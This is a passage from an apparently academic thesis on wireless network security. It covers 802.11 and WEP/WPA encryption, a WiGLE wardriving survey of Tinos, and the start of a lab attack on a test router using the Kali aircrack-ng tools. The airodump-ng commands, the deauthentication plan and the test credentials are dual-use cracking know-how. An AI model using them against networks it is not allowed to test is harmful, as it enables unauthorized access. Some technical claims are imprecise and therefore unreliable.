The Distribution System (DS) is the component of the architecture that interconnects BSS. The
connection is achieved by connecting the access points of the BSS together via a network trunk. This
solution enables communication of wireless stations located in different BSS, as well as the migration
from one BSS to another without interrupting the communication. Of course, this can only be done
provided that there are no gaps in coverage between BSS.

2.6.3. Services of IEEE 802.11

The IEEE 802.11 defines a set of services that provides the functionality needed to let the LLC layer send
and receive MSDUs (MAC Service Data Units) and provides functionality equivalent to that of wired
networks.
The services include the following:

Distribution: A station uses the distribution service every time it sends MAC frames across a distribution
system. The 802.11 standard does not specify how the distribution system delivers the data. The
distribution service provides the distribution system with only enough information to determine the
proper BSS destination.

Integration: Because the characteristics of the distribution system are unspecified by the IEEE 802.11
standard, integration is needed. The integration service enables the delivery of MAC frames through a
portal between a distribution system and a non-802.11 LAN. The integration function performs all
required media or address space translations. The details of an integration function depend on the
distribution system implementation and are beyond the scope of the 802.11 standard.

Delivery of MSDU: The delivery of MAC Frames (MAC Service Data Unit) to their final destination.
[12]
Association: Each station must initially invoke the association service with an access point before it can
send information through a distribution system. The association maps a station to the distribution system
via an access point. Each station can associate with only a single access point, but each access point can
associate with multiple stations. Association is also a first step to providing the capability for a station to
be mobile between BSSs.
Reassociation: Enables an association that's been restored to be transferred from one access point to
another, allowing a mobile station to move from one BSS to another, while retaining the connection to
the network.
Disassociation: A station or access point may invoke the disassociation service to terminate an existing
association. This service is a notification; therefore, neither party may refuse termination. Stations should
disassociate when leaving the network. An access point, for example, may disassociate all its stations if
being removed for maintenance.
Authentication: It is used to verify the identity of the stations between them. In a wired network, it is
generally considered that access to physical connection transferring the right of network connectivity. In
wireless networks, the physical connection is achieved simply by having an antenna properly
coordinated. For this reason, the authentication service uses the stations for verification of their identity.
Deauthentication: This service is used when an existing certification is terminated.
Privacy: It is used to prevent the reading of the contents of messages from stations, other than the
intended recipient. This standard allows the optional use of encryption to ensure protection.

2.6.4.IEEE 802.11 Protocol Architecture

The IEEE 802 standards committee defines two separate layers, the Logical Link Control (LLC)
and media access control, for the Data-Link layer of the OSI model. The IEEE 802.11 wireless standard
defines the specifications for the physical layer and the media access control (MAC) layer that
communicates up to the LLC layer, as shown in the following figure.

Image 7 - 802.11 and OSI Model

Source: technet.microsoft.com

The physical layer defines how to transmit and receive signals. The Data link layer of the OSI
model is subdivided into two sublevels, the Medium Access Control (MAC) and the Logical Link
Control (LLC). The MAC sublayer defines how to access the transmission medium and the reliability of
data transmission. Finally, the LLC sublayer is a connecting plane, which is shared at all IEEE LAN
standards.

[13]
The MAC sublayer is responsible for controlling the following functions:
 Controlling access stations in the transmission medium
 The mode of fragmentation and reassembly
 The operation of the relay packet (packet retransmission)
 The function of a positive acknowledgment.
In architecture of MAC sublayer specifies two access methods:
 Distributed Coordination Function (DCF)
 Point Coordination Function (PCF)
We observe that the DCF mode is the basic method because it works as a basis for the PCF, allowing
implementing a polling algorithm trying to ensure better QoS.
Distributed coordination function (DCF) is the fundamental MAC technique of the IEEE
802.11 based WLAN standard. The DCF method is the basic method used for support on asynchronous
data transfer. As defined in the standard, all stations must support the DCF method. Its operation is based
on the Protocol Carrier Sense Multiple Access with Collision Avoidance (CSMA / CA). The DCF
method does not support any detection mechanism of conflicts, such as CSMA / CD, because the
detection of conflict is not practical in a wireless network. For transmission the station should monitor the
physical medium to ascertain if another station is transmitting. In wired networks to monitor the channel
is very easy to do because all nodes are connected to a common cable and can communicate with each
other. Contrary to wireless networks transceiver each station has a limited scope and can communicate
directly only with the neighboring stations. The Communication with more remote stations is carried out
using other intermediate which is able to promote the package to the final destination. To be able to
follow the Channel exchanged specially checkboxes Request to Send (RTS) and Clear to Send (CTS)
between sender and receiver. This mechanism controlling the physical medium to reduce the probability
to occur packet collision. The exchange is done after checking the availability medium and just before
sending the data. Improves reliability in networks with many stations, where the probability of collisions
is increased.
Point coordination function (PCF ) is a Media Access Control (MAC) technique used in IEEE 802.11
based WLANs. It is an alternative method that operates a level above the DCF method, because the
access method rotated for some time, the PCF is used for the rest is used DCF. It requires the existence of
a central station (Point Coordinator) who assumes centralized management of emissions on other
stations. The Point Coordinator asks all stations cyclically whether they have data to send and can emit
only if it’s allowed.

The MAC framework

The devices used in wireless networks communicate by sharing frameworks in sublayer MAC. The
formatting frames 802.11 shown below.

Image 8 - 802.11 MAC Frame Format

Source: technet.microsoft.com

[14]
The MAC frame consists of the header with length 30 bytes, from frames of variable length and the
frame FCS with length 4 bytes.
Frame Control Field
This field is important because it states the type of frame and provides control information.

Image 9 - Frame Control Field

Source: technet.microsoft.com

It consists of 11 subfields, which are important for security mechanisms of 802.11 and are the following
below.
 Protocol version: Indicates the version of 802.11 MAC contained into frame.
 Type: Determines the three frame types, control frames, data frames and management frames.
 Subtype: subdivides each of the basic types of framework, in some subtypes.
 To DS: This bit is set to 1 when a data frame intended for the distribution system.
 From DS: This bit is set to 1 when a data frame leaves the distribution system.
 More fragments: The field has a value of 1 when after follow this and other sections.
 Retry: If a value of 1, the frame is retransmitted.
 Power Management: Identifies the state station of power management. If the value is 1, the station
emits is in sleep (sleep mode).
 More Data: Indicates that a station has stored and other data to be sent. Each Data blocks may be
transmitted as a frame or as a group parts in multiple contexts.
 Protected frame (WEP): The frame is called the original WEP standard802.11. With version
802.11i changed name and declares on the honor1 in that the body of the frame is encrypted with a
security protocol.
 Order: If it has a value of 1 indicates that the service is used the Compliance Series (strictly
ordered).
Duration/ID Field
This field is used for all control type frames, except with the subtype of Power Save (PS) Poll, to indicate
the remaining duration needed to receive the next frame transmission. When the sub-type is PS Poll, the
field contains the association identity (AID) of the transmitting STA.
Address Fields
Depending upon the frame type, the four address fields will contain a combination of the following
address types:

 BSS Identifier (BSSID). BSSID uniquely identifies each BSS. When the frame is from an STA
in an infrastructure BSS, the BSSID is the MAC address of the AP. When the frame is from a
STA in an IBSS, the BSSID is the randomly generated, locally administered MAC address of the
STA that initiated the IBSS.

[15]
  Destination Address (DA). DA indicates the MAC address of the final destination to receive the
frame.

 Source Address (SA). SA indicates the MAC address of the original source that initially created
and transmitted the frame.

 Receiver Address (RA). RA indicates the MAC address of the next immediate STA on the
wireless medium to receive the frame.

 Transmitter Address (TA). TA indicates the MAC address of the STA that transmitted the
frame onto the wireless medium.

Sequence Control
This field contains two subfields, the Fragment Number field and the Sequence Number field.

Image 10 - Sequence Control Field

Source: technet.microsoft.com

Sequence Number indicates the sequence number of each frame. The sequence number is the same for
each frame sent for a fragmented frame; otherwise, the number is incremented by one until reaching
4095, when it then begins at zero again.
Fragment Number indicates the number of each frame sent of a fragmented frame. The initial value is
set to 0 and then incremented by one for each subsequent frame sent of the fragmented frame.
Frame Check Sequence
The transmitting STA uses a cyclic redundancy check (CRC) over all the fields of the MAC header and
the frame body field to generate the Frame Check Sequence value. The receiving STA then uses the same
Cyclical Redundancy Check (CRC) calculation to determine its own value of the Frame Check Sequence
field to verify whether or not any errors occurred in the frame during the transmission.

[16]
 CHAPTER 3: SECURITY IN WIRELESS NETWORKS

The advantages of the use of wireless networks are numerous. Data moving through the network is
transmitted using radio frequencies. This allows anyone to connect to the network. This immediately
created the need for network security. Trust, integrity, certification and availability of exchanged
information, now bounded by the encryption protocols, which were based on already known
cryptographic methods, thus inheriting whatever drawbacks and benefits existed from other
implementations of modern cryptography.

3.1. What is encryption?

In cryptography, encryption is the process of encoding messages or information in such a way that only
authorized parties can read it. There are two groups of encryption algorithms:
1. Symmetric encryption algorithms, are also known as private-key cryptography algorithms, where
the encryption and decryption keys are the same and communicating parties must have the same
key before they can achieve secure communication.

2. Asymmetric encryption algorithms, are also known as public-key cryptography algorithms,

where the encryption key is published for anyone to use and encrypt messages, but only the
receiving party has access to the decryption key that enables messages to be read.
The main purpose of encryption is to provide mechanisms for two or more members to communicate
without anyone else having the capability to read the information.
The four main functions of encryption are the following:
Confidentiality: The information to be transmitted is only accessible to the authorized
members. The important is that this information is incomprehensible to someone third.
Integrity: Its integrity of information refers to protecting information from being modified by
unauthorized parties.
Availability: Availability of information refers to ensuring that authorized parties are able to
access the information when needed.
Non-repudiation: Refers to a state of affairs where the author of a statement will not be able to
successfully challenge the authorship of the statement or validity of an associated contract.
To make an encryption there are some basic definitions, such as:
 Plaintext that is the information a sender wishes to transmit to a receiver.
 Key that is a piece of information that controls the operation of a cryptography algorithm.
 Cipher text-Encrypted Information that is the result of encryption performed on plaintext using
an algorithm, called a cipher.

Image 11 - A simple Encryption-Decryption system

Source: msdn.microsoft.com
[17]
The encryption and decryption of a message is done using an algorithm and an encryption key. Usually
the algorithm of encryption is known, so that the confidentiality of the encrypted message transmitted is
based mostly on the privacy of the encryption key.

3.1.1. Symmetric key encryption

Symmetric key encryption is a cryptography technique that uses a shared secret key to encrypt and also to
decrypt data.
The disadvantage of the symmetric-key encryption is the impossibility to exchange the key in a secure
way. These algorithms require agreement between the sender and consignee for the key that will be used
to allow them to communicate securely.
Instead, the main advantage of symmetric key algorithms is that the process of encryption and decryption
is very fast and does not consume significant computing power. Symmetric encryption algorithms are
very efficient at processing large amounts of information and computationally less intensive than
asymmetric encryption algorithms.
There are two types of symmetric encryption algorithms: stream ciphers and block ciphers which provide
bit-by-bit and block encryption respectively.

3.1.2. Public key encryption

Public-key cryptography, also known as asymmetric cryptography, is a class of cryptographic
protocols based on algorithms that requires two separate keys, one of which is secret (or private) and one
of which is public.
Public key cryptography was invented in 1976 by Whitfield Diffie and Martin Hellman. For this reason,
it is sometime called Diffie-Hellman encryption. It is also called asymmetric encryption because it uses
two keys instead of one key (symmetric encryption).
The key used for encryption is different from the key used for decryption. The sender and the recipient
have different keys for different functions, private and public key. The private key must be kept secret,
whereas the public key can be communicated to the recipients.
The success of this type of cryptographic algorithms is based on the fact that the knowledge of the public
encryption key does not allow in any way the calculation of the private key.

3.2. Wireless network encryption protocols

In several areas in Greece, even today, one can observe that there are several networks that do not use
any kind of encryption. In these unsecured networks it is obvious that there is no protection for users who
are connected, regarding information exchange and stored data within the network.
Encryption of wireless networks can be divided into two main categories:
1. WEP encryption protocol: Nowadays there are widespread techniques of finding the secret key
to this type of encryption protocol. It is used the RC4 encryption algorithm.
2. WPA/WPA2 encryption protocols: It replaced the unsecured WEP and it uses CCMP algorithm,
which is based on AES (Advanced Encryption Standard).

3.2.1. WEP encryption

The encryption algorithm RC4 (River Cipher 4) ensures in Protocol both confidentiality and integrity of
data.

[18]
 Image 12- Standard WEP Encryption Process using RC4 algorithm with XOR operation

Source: resources.infosecinstitute.com
It is a symmetric encryption algorithm with length of 64 or 128 bit, which generates a pseudo random bit
sequence of, associated to the device in encrypted text (cipher text) with the known XOR function in
order to generate the cipher text. The encrypted text generated using 24 bit of the Initialization Vector
and the encryption key (pre-shared key) entered by the user, with length 40 or104 bit. The result is
inserted in an XOR gate with the original text(plain text) to build up the final encrypted text.
Validation ensured by controlling packets. The algorithmCRC32 has been developed to detect, identify
and often times corrects errors during transmission of packets.

3.2.2. WPA encryption (Wi-Fi Protected Access)

In 2004, IEEE standard with version 802.11i developed a new security protocol for Wireless Protected
Access, the WPA. Essentially it is the replacement of WEP, because it was necessary in wireless
transmission for more security. It was one solution until full development of version 802.11i with
Protocol WPA2. The WPA encryption improves WEP and adds a powerful authentication mechanism.
WPA allows for two kinds of security authentication types, WPA-802.1x (AKA WPA-Enterprise) and
WPA-PSK (or WPA-Home).
 WPA-PSK (pre-shared key)is basically an authentication mechanism in which users provide some
form of credential to verify that they should be allowed access to a network. This requires a
single password entered into each WLAN node (Access Points, Wireless Routers, client
adapters, bridges). As long as the passwords match, a client will be granted access to a WLAN.
Image 13 - WPA-PSK mode

Source: www.tp-link.us

 WPA-Enterprise. This mode provides the security needed for wireless networks in business
environments. It is more complicated to set up, and it offers individualized and centralized control
over access to your Wi-Fi network. When users try to connect to the network, they need to present
their login credentials.
[19]
 Image 14 - WPA- Enterprise mode

Source: www.tp-link.us
This mode supports 802.1x RADIUS authentication and is appropriate in the cases where
a RADIUS server is deployed. WPA-Enterprise should only be used when a RADIUS server is
connected for client authentication.

3.2.2.1 Security in WPA

WPA uses the RC4 algorithm, which consists of the initialization vector, 48 bit in length (compared to 24
bit in WEP) and a security key, 128 bit in length.

Image 15 - WPA implementation (*)

where DA = Destination Address , SA = Source Address

The existence of RC4 ensures compatibility with previous versions of wireless networking products. In
addition, WPA introduces a new Temporal Key Integrity Protocol (TKIP), which dynamically takes over
the renewal of keys during the connection. To reduce the repetition rate of the same key is used one
number sequence per broadcast package, a pre-shared key and the transmitted MAC address.
The initialization vector is added to the new generated key and then a new key stream is generated. To
enhance integrity of the packages has added a control field of the integrity of data, the MIC (Message
Integration Check). The value of the MIC is calculated by the cryptographic algorithm “Michael” and
protects the message and addresses of the sender and recipient. A further feature is that it supports a
special mechanism that detects any attempted violation of TKIP, thereby blocking communication.

3.2.2.2. Authentication in WPA

The authentication to the encryption protocol WPA-Personal or WPA- PSK is designed for professional
and home use. With this method user authentication is done via the Access Point using a phrase 8 to 63

[20]
ASCII characters. When the ASCII characters are selected, one hash function assumes a reduction of
504-bit (63characters * 8bit) to 256-bit.
Subsequently the access point to the station provides a temporary key which is updated at regular
intervals. The 256-bit key is calculated using the hash function PBKDF2using the original code as a key.

3.2.3. WPA or WEP

WPA and WEP encryption protocols use the RC4 encryption algorithm. However, WEP uses
initialization vector with length 24-bit, encryption key with length 40 or 104 bit, in contrast to WPA that
uses initialization vector with 48-bit and encryption key with length 128-bit.
WEP is insufficient for security, because the attacks targeted on initialization vector and on changes of
packages. WPA has minimized such attacks because of the combination of TKIP, the MIC and the
longest initialization vector.
TKIP key uses about 250 trillion possible keys to encrypt the packet. Combining this with the 48-bit
initialization vector, TKIP contributes to effective security network on key recovery attacks. Also, the
MIC provides protection on subject of packets interception.
WPA-Enterprise and WPA-PSK encryption provide a strong security mechanism. In WEP authentication
of the user were by sharing of a common key. In WPA, authentication and encryption are separate
functions. The authentication in 802.1x server is done with credentials and the keys are distributed
automatically.

3.2.4. WPA2 (Wi-Fi Protected Access Version 2)

WPA2encryption protocol is the successor of WPA. It is a part of the 802.11istandard. Encryption is
performed under CCMP algorithm, which for its development was based on the CCM of AES algorithm.

Image 16 - WPA2 implementation

Upon entry of the new algorithm, RC4algorithmwas replaced. Like TKIP, CCMP also uses initialization
vector with length 48-bit, but instead of use of sequence of numbers per package, it uses AES key to
protect confidentiality and integrity of the package.
It uses initialization vector with length 48-bit and encryption key with length 128-bit which minimizes
the vulnerability of the system to repeated attacks. The enhanced protection provided by CCMP in
comparison to TKIP requires more processing power, and often need new or upgraded hardware.

[21]
 3.3. Types of Attacks on wireless networks
Wireless networks because of transmission medium are susceptible to attack. These attacks carried out
for different purposes, for example, an attacker may simply wants to control the traffic or access into a
network.
Attacks on ad hoc wireless networks can be classified into two broad categories, namely, passive and
active attacks.

3.3.1. Passive attacks

On this case, unauthorized party gains access to a network and do not modify any resources on the
network. There are two types of passive attacks:
 Traffic Analysis: Traffic analysis attacks are those in which the attacker gains information derived
from the access points, thus knows the network name, the broadcast channel, the encryption
method, and MAC addresses of participants.
 Packet Sniffing: Packets sniffing attacks operate identically to the traffic analysis attacks and here
it’s disclosed network information. Moreover, the attacker has access and can read the contents of
messages. If the message is encrypted, an attacker must decrypt it first. In addition to reading the
information, become known more characteristics of the packet.

3.3.2. Active attacks

An active attack attempts to alter or destroy the data being exchanged in the network, thereby disrupting
the normal functioning of the network.
These are divided into the following categories:
 Unauthorized Access
The attacks of unauthorized access are not intended to harm any particular user, but unauthorized
network access. In some network architectures when the attacker invades a wireless network, acquire all
rights, while in others to have access to all network capabilities must be an authorized user, usually by
applying Access Control Lists. However Access control lists can be violated by the technique of
spoofing. With this technique the attacker copies the network name and creates another with strongest
signal, causing computers to connect to fake network transmitting all the data through it.
 Man in the Middle Attack
A man-in-the-middle attack (often abbreviated to MITM, MitM, MIM, MiM or MITMA) is an attack
where the attacker is in the middle of conversation and displayed in the access point as a user and to the
user as the access point.
 Denial of Service (DoS) Attack
This type is the most widespread attack to become a wireless network unusable for some time. This can
be accomplished by sending multiple packets to the network, so the entire processing strength of the
access point to be consumed in their processing.
Most important types of DoS attacks are:
 Flood Attack
 Ping of Death
 SYN attack
 Smurf attack
[22]
 EMPIRICAL PART 1
CHAPTER 4: LOCATION ANALYSIS IN TERMS OFWIRELESS NETWORKS SECURITY

4.1. About Wardriving

The term «Wardriving» describes the practice in which one user wanders through the streets of
neighborhoods, provided with a device. It has wireless access in order to detect wireless networks and to
maps their existence for statistical or other reasons.
It took its name from a common practice in1980 known as «Wardialing» in which the “perpetrators”
were calling telephone numbers in order to locate dial-up, and then attempt the illegal use of these
modems for the illegal access to telephone networks, subsequently on the internet.
Wardriving was first reported in the US in 2000, in a survey for wireless networks in the city of Berkeley
California. This research aimed to show the security gaps of wireless networks which were growing
rapidly at Berkeley, and it was necessary to improve the wireless network technology in terms of security
of information systems.
The survey showed that access to wireless network is possible, using simple tools, even over a long
distance from where the wireless transmitter is mounted.
Wardriving does not require the use of expensive or hard to find equipment for carrying out this
verification. It can be done using either a laptop computer or a smartphone.

4.2.Wardriving Equipment

There are many tools for this type of attack. In our project we are going to use a smartphone and android
application Wigle.

Image 17 - Vodafone Smart 4 Review Image 18– WigleWifiWardriving Application at Google Play Store

Source: www.alphr.com Source: dalewifisec.wordpress.com

[23]
Specifically, the equipment we use is:
1. A smartphone, Vodafone Smart 4 with android version 4.4.2.
2. Android application, Wigle Wifi Wardriving, version 2.7. It’s free.
3. Gps receiver. This is provided by specific smartphone.
4. Microsoft Excel 2010. It’s needed for data analysis.

4.2.1. Why a smartphone

A smartphone or smart phone is a mobile phone with an advanced mobile operating system which
combines features of a personal computer operating system with other features useful for mobile or
handheld use.
They typically combine the features of a cell phone with those of other popular mobile devices, such
as personal digital assistant (PDA),media player and GPS navigation unit.
Its operating system, Android, is also a good feature as it is an open-source platform with numerous
capabilities. The billions of applications that exist for android platform can transform a smartphone to a
strong device with lower cost.
Especially for Wardriving , a Smartphone with an android application can provide the same result as a
laptop with a wireless network card and a GPS receiver.

4.2.2.Wigle Wifi Wardriving Android Application

WigleWifi Wardriving Android Application is an open-source wardriving application to net stumble,
display and map founded wireless networks and cell towers anywhere in the world.

Image 19– WigleWifiWardriving Android Application Framework

Source: andronexus.store.aptoide.com

WiGLE was started in 2001. Some of the features of current version are:
 Export to CSV files on SD card (comma separated values).
 Export to KML files on SD card (to import into Google Maps/Earth).
 Local database to track new networks found
[24]
  Real-time map of networks found (Open Street Map)
 Bluetooth GPS support through mock locations
 Can move app to SD card

4.3.Wardriving analysis in and around central town of Tinos Greek island

For the purposes of this project we decided to map the central town of Tinos, a Greek island, reflecting
on the map the route and type of wireless networks detected. The study was conducted from September
20, 2015 to October 4,2015. It covered a distance of approximately 46 km and recorded 1.416wireless
networks.
At first, to find out the total number of wireless networks we had to identify and record the SSID (Service
Set Identifier)of wireless networks.
SSID is a case sensitive, 32 alphanumeric character unique identifier attached to
the header of packets sent over a wireless local-area network (WLAN) that acts as a password when a
mobile device tries to connect to the basic service set (BSS) -- a component of the IEEE 802.11 WLAN
architecture.
The SSID differentiates one WLAN from another, so all access points and all devices attempting to
connect to a specific WLAN must use the same SSID to enable effective roaming.
So, we turn on Wigle application and we wandered through the streets of the central town of Tinos to
discover all available wireless networks.
The next step was to export all data from application to suitable file type for analysis, such as .CSV and
.XLS file extensions.
Application has the ability to immediately export data to these file extensions.

Image 20 - Data tab in WigleWardriving app

Source: andronexus.store.aptoide.com

We chose DATA tab and then one of the choices:

 CSV Export Run

 CSV Export DB
CSV extension is suitable for Microsoft Excel and for extracting conclusions about the most common
wireless network security, the most used SSID and the most common channel where wireless network is
[25]
located. The difference between the above two choices is that CSV Export Run will export the networks
it has picked up in total during only one session. On the other hand, CSV Export DB will export the total
number of networks that have been scanned and stored in the database.
 KML Export Run
 KML Export DB
The above two choices are about a very important file extension, suitable for Google Earth or Google
Maps. In this case, the exported KML file can be uploaded in Google Maps or Google Earth and to show
you directly all the locations of discovered wireless networks. This can be done more easily, if in the
Smartphone Google Earth Application is installed. So, when KML file extension is exported, this will be
recognized by Google Earth application and you can open KML file directly only by double clicking on it
to see the map with locations of discovered wireless networks.
The following picture shows all founded networks in and around central town of Tinos.

Image 21 - Wireless Networks in and around central town of Tinos Greek Island – Google Earth view

The figure 22 shows all the path that was followed.

Image 22 - Wardriving followed paths in and around central town of Tinos Greek Island – Google Earth view

[26]
 4.3.1. Preparation process for analysis of data
For CSV analysis we used Microsoft Excel 2013. For reading the extracted .CSV file, we made the
following steps:

Step 1. Click on DATA tab  From Text

Image 23 - Step 1 preview

Step 2. Find CSV file and click on it  Open

Image 24 - Step 2 preview

After we completed the prerequisite text import wizard, we have classified the data of CSV file uniformly
like the following figure.

Image 25 - Uniformly classified data of CSV file

[27]
Step 3. We have to clean the data

After the right modification we had the result in image 26:

 Removing rows with GSM value in Type Column
 Removing duplicate rows with same value in MAC column .

Image 26 - Table of data after the right modification

4.4. Security analysis of wireless networks in and around central town of Tinos Greek
Island-Results

Analyzing the CSV data we observed that 1.396 in 1.416 wireless users use WPA or WPA2 encryption,
only 1,4% use the completely insecure WEP, while no users use non-security encryption!
Table 1 displays the results of the total allocation of security protocols, while graph 1 shows graphically
the distribution of security protocols in percentage.
Security Times %
WEP 20,00 1,4
WPA or WPA2 1396,00 98,6
No Protection 0,00 0
Total 1416,00 100

Table 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data

Security Analysis of Wireless Networks in and

around central town of Tinos Greek Island

WEP WPA or WPA2 No Protection

Graph 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data
[28]
These results justify the following fact. In recent years, all providers and manufacturers of wireless
devices provide wireless devices with preconfigured the WPA / WPA2 protocol. The devices are shipped
to the end user with default settings and personalized. This means that each device has implemented the
WPA / WPA2 protocol with a predefined different password. So it's very easy for someone to have
security on their wireless network without the necessary knowledge.

4.5. Channel analysis of wireless networks in and around central town of Tinos Greek
Island-Results
Wireless networks in the frequency band of 2.4 GHz implement 13 different channels with a width of 22
MHz each one.
Channel analysis shows that the vast majority of networks use specific channels. These are channel 1,
channel 6 and channel 11. The most channels remain substantially unused. This means that the network
efficiency declines, there are increased mistakes and retransmission schemes, even loss of data reliability.
Channel Times %
1 433,00 30,6
2 60,00 4,23
3 27,00 1,91
4 32,00 2,26
5 19,00 1,34
6 300,00 21,19
7 35,00 2,47
8 27,00 1,91
9 114,00 8,05
10 36,00 2,54
11 281,00 19,83
12 15,00 1,06
13 37,00 2,61
Total 1416,00 100

Table 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data

Channel Analysis of Wireless Networks in and around

central town of Tinos Greek Island

1 2 3 4 5 6 7 8 9 10 11 12 13

Graph 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data
[29]
 EMPIRICAL PART 2
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS

In the previous chapter, we saw one of the most prevalent ways in which an analysis was made in
protection protocol used in wireless networks of a particular research area. As already noted above, WPA
& WPA2 protection protocols are the most widespread in the study area because of the predetermined
procedure for implementing protection wireless network from the manufacturing company of the router
device.
In addition to the above research, knowing that WPA2 is one of the widely used security protocols, we
carry out a series of attacks to find the encrypted key of a tested device, using the strong Kali Linux
distribution.

5.1. About Linux, a good environment

Linux or GNU/Linux is a free and open source software Unix-like operating system for computers.
Its development is a characteristic example of voluntary cooperation from online communities, while all
the project is an open source and freely accessible to all for copy, modification or redistribution without
restriction.

Image 27 -Tux the penguin, mascot of Linux

Source: en.wikipedia.org

It can be installed and operates in a wide variety of computer systems, from small devices such as mobile
phones to large computer systems and supercomputers.
In distributions of Linux, the core with accompanying programs such as libraries, system tools, Windows
interface and many other applications required for the proper functioning of a computer are available.
A characteristic of distributions is the great potential for the configuration they offer as each one is
addressed to a different kind of user.

5.2.About Kali linux, the next generation of Backtrack

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing.
It is maintained and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns and Raphaël
Hertzog are the core developers.

[30]
 Image 28 - Kali Linux logo

Source: www.offensive-security.com

Kali Linux is preinstalled with over 600 penetration-testing programs, including:

1. Nmap (a port scanner),
2. Kismet (a wireless network detector)
3. RFMON ability for 802.11 wireless network cards,
4. Wireshark (a packet analyzer),
5. John the Ripper (a password cracker),
6. Aircrack-ng (a software suite for penetration-testing wireless LANs),
7. Burp suiteand OWASP ZAP (both web application security scanners).

Kali Linux can run when installed on a computer's hard disk, can be booted from a live CD or live USB,
or it can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit
Framework, a tool for developing and executing security exploits.
Kali linux tools are classified into the following categories:
 INFORMATION GATHERING
 VULNERABILITY ANALYSIS
 WIRELESS ATTACKS
 WEB APPLICATIONS
 REPORTING TOOLS
 HARDWARE HACKING
 REVERSE ENGINEERING
 MAINTAINING ACCESS
 PASSWORD ATTACKS
 SNIFFING & SPOOFING
 STRESS TESTING
 FORENSICS TOOLS
 EXPLOITATION TOOLS
 REPORTING TOOLS

5.3.Equipment for Cracking Wireless Networks Security

For this type of attack, we use specific tools such as a conventional network card, Kali Linux distribution
and a wireless network that uses WPA / WPA2 encryption.
In particular, for the attack we have used:

[31]
  Laptops
We have used two laptops for simulating the attack.

Image 29 - Samsung R530 preview

Source: www.cnet.com
The first one is model Samsung R530.The attacks were carried out using the available integrated wireless
network card of this laptop.

Image 30 - HP Compaq 610 preview

Source: driverbasket.com

The second laptop has suffered attacks. Its model is HP, Compaq 610q. It features integrated wireless
network card that supports the standards IEEE 802.11b, IEEE 802.11g, IEEE 802.11n and WEP / WPA /
WPA2encryption methods.

 Wireless medium of access

The wireless medium of access that has suffered attacks is the model Huawei Echolife HG520c. It has 4
Ethernet ports and supports standards IEEE 802.11b and IEEE 802.11g.

Image 31 - Huawei Echolife HG520c preview

Source: websec.ca
[32]
For the realization of the attacks, WPA2 encoding with SSID «Wind_Wi_Fi» and password
«tinosemagazine11» was defined.

5.4. Preparation of attack

In WPA / WPA2 attacks, the user enters a keyword which is not involved in the sending of encoded
packets, but is associated with the MAC Address of each client station and according to the48-bit length
of initialization vector, generates the key with which the encoding of data will be performed.
Therefore, the code key to the transmitted packets is different for each device. The attacker will try to
compromise the wireless network when an access point requests to connect to the base station
(handshake), because these packages certainly contain the secret keyword, which is set as the
authentication key to the network.
The attacker using specialized applications will attempt to identify users who are connected to a wireless
network, collecting the necessary packages. To download this package, the attacker has two options:
 Either waiting for a user to connect successfully to an access point.
 Either to cause disconnection to the already connected user, in order to try to reconnect creating
new packets «handshake».
After having received the packet «handshake» (which contains the secret key), it will be analyzed by
applications that perform dictionary attacks.

5.4.1.Dictionary attack
The dictionary attack is a method to crack a wireless network. It is very efficient and fast because many
computer users insist on using common passwords.
Usually all possible combinations of 8-character words contained in such dictionaries. It turns out those
words in length less than 20 characters, it is statistically impossible to withstand this kind of attack. The
dictionary attacks are rarely successful against systems that use many keywords phrases, and
unsuccessful against systems using random combinations of capital and lower case letters and contain
numbers and symbols.

5.4.2. Pre-computed hashes

The pre-computed hashes are files (quite large) which contain budgeted hashes, for a series of codes. The
point is that these files greatly reduced the time of dictionary attack since calculation of the hash for each
password has been and remains to be compared to that has been captured.
In WPA, the hash results from the code that has been selected in combination with the SSID. So the
hashes that have been calculated in these files going to apply to specific SSID, which are those normally
used by default (e.g. linksys, netgear).

5.5. The Aircrack-ng suite

For these kind of attacks we will use as part of our research the “Aircrack” suite that is included in Kali
Linux distribution.
“Aircrack-ng” suite is a very important suite that offers powerful tools for recovering the key used in the
security of a wireless network. Below, we will present all the steps that must be followed to be able to
retrieve the encrypted key (the key of the client) of a wireless network in the case of a dictionary attack
and in the case of an attack with pre-computed hashes.

[33]
The aircrack-ng suite includes:
 airmon-ng
 airodump-ng
 aireplay-ng
 aircrack-ng
 airolib-ng

5.5.1.About Airmon-ng
At first, to be able to carry out the attack we must put the computer's network card that performs the
attack on monitor mode. That process is done with “Airmon-ng”.
“Airmon-ng” is used to put our network card in monitor mode.
Usage
airmon-ng {start|stop} {interface}
where
start|stop determines whether to activate or to deactivate monitor status in our wireless card.
interface specifies the network card to which you want to enable / disable monitor status

Image 32 - The wireless card in monitor mode

5.5.2 About Airodump-ng

After that, we should start the process of capturing information packets and the collection of IVs. For
this purpose “Airodump-ng” is used.
“Airodump-ng” is used to capture packets from 802.11 networks and for collecting IVs (Initialization
Vectors). It can also used to identify 802.11 networks that are within coverage in our card.

[34]
Usage
airodump-ng {interface}
where
interface specifies the network card that will be used in order to record packets.

Image 33 - Collection of Initialization Vectors (IVs)

Analyzing the collection process of “Airodump-ng”:

 On BSSID tab is displayed the MAC address of access points that are in range of our card.
 On PWR tab we can see the signal strength
 On Beacon tab we can see the beacon frames that have been received from each AP.
 On #Data tab we can see the packages that we have received from each AP.
 On #/s we can see the rate at which we send packages to the AP.
 On CH tab we can see the channel in which the AP operates.
 On ENC tab we can see the type of encryption that is used.
 On ESSID tab we can see what is the name of the network

When customers are connected to the AP we have the following customer details.
 The address of the AP to which is connected the customer appears below the BSSID.
 Under Station is shown MAC address of the client.
 Under Packets is shown the number of packets that have recorded and are intended for this client.

In order to obtain more rapidly the packets that the interest access point send, and record the packets that
will be injected, we need to focus on the specific access point.
Usage
airodump-ng --channel 1 --write Wind_Wi_Fi --bssid 4C:ED:DE:1E:96:8E wlan0mon

[35]
 Image 34 - "Concept" of the handshake packet

Image 35 - "Concept" of the handshake packet

The choices that we have are:

-channel: specifies the channel.
--bssid: specifies the MAC address of the target access point.

5.5.3. Aircrack-ng

“Aircrack-ng” is a tool that is used to crack a encryption key of an access point. It is the first of the four
attacks that will be performed in this investigation, in an attempt to ascertain which of these attacks is the
fastest and most effective. Like most attack tools, “aircrack-ng” uses the log of IV's and a dictionary file.

Usage
